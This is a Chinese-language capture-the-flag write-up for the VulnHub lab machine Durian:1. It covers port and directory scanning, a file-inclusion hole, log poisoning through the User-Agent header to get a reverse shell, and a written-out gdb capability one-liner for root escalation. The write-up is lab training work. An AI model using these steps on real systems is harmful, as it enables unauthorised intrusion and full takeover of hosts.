VulnHub渗透测试实战靶场-Durian:1

VulnHub渗透测试实战靶场-Durian:1

  • 环境下载
  • HA:NARAK靶机搭建
  • 渗透测试
    • 信息搜集
    • 漏洞挖掘
    • getshell
    • 提权

环境下载

  • 戳此进行环境下载

HA:NARAK靶机搭建

  • 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可

渗透测试

信息搜集

  • 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l
  • 得到目标靶机的IP为:192.168.246.141
VulnHub渗透测试实战靶场-Durian:1_第1张图片
  • 使用 nmap 扫描开放的端口:sudo nmap -sU -Pn 192.168.246.141,发现开放了 22、7080、8000、8088 四个端口
VulnHub渗透测试实战靶场-Durian:1_第2张图片
  • 使用 dirb 扫描一下开放的 8000 端口:dirb http://192.168.246.141:8000
VulnHub渗透测试实战靶场-Durian:1_第3张图片

漏洞挖掘

  • 查看扫描结果,发现 blog 目录下的文件都是可以下载的,疑似源码泄露(感觉没啥用处除了告诉你是 wordpress)
VulnHub渗透测试实战靶场-Durian:1_第4张图片
  • 查看 http://192.168.246.141:8000 的源码时发现关键信息,访问 http://192.168.246.141/cgi-data/ 发现后门文件,存在文件包含漏洞
VulnHub渗透测试实战靶场-Durian:1_第5张图片
  • 尝试包含 /etc/passwd,发现成功触发该漏洞,考虑到开放了 ssh,尝试向日志文件中写入 shell,先查看一下日志文件位置是否正确
VulnHub渗透测试实战靶场-Durian:1_第6张图片 VulnHub渗透测试实战靶场-Durian:1_第7张图片

getshell

  • 注意到日志文件中有 User-Agent 的信息,藏尸抓包向 UA 中写入 shell,让靶机使用文件包含漏洞将木马文件下载到本地
VulnHub渗透测试实战靶场-Durian:1_第8张图片 VulnHub渗透测试实战靶场-Durian:1_第9张图片
  • 起一个 nc 监听,访问 http://192.168.246.141/blog/shell.php,成功接收到反弹 shell
VulnHub渗透测试实战靶场-Durian:1_第10张图片

提权

  • 利用 sudo -l 查看信息进行提权
getcap -r / 2>/dev/null
gdb -nx -ex 'python import os;os.setuid(0)' -ex '!bash' -ex quit 
getcap -r / 2>/dev/null
getcap:查看可执行文件获取的内核权限
r:代表顶层目录
2>/dev/null:就是将标准错误stderr删掉

gdb -nx -ex 'python import os; os.setuid(0)' -ex '!bash' -ex quit
gdb:简单理解就是可以启动程序并且按照自己的自定义随心所欲的运行程序
-nx:不要从任何.gdbinit初始化文件执行命令
-ex"执行给定的GDB命令
简单理解就是首先利用gdb的权限去执行命令:命令的作用是利用python 设置一个uid为0(就是root)的shell
VulnHub渗透测试实战靶场-Durian:1_第11张图片

你可能感兴趣的:(#,VulnHub,VulnHub,渗透测试,linux,安全)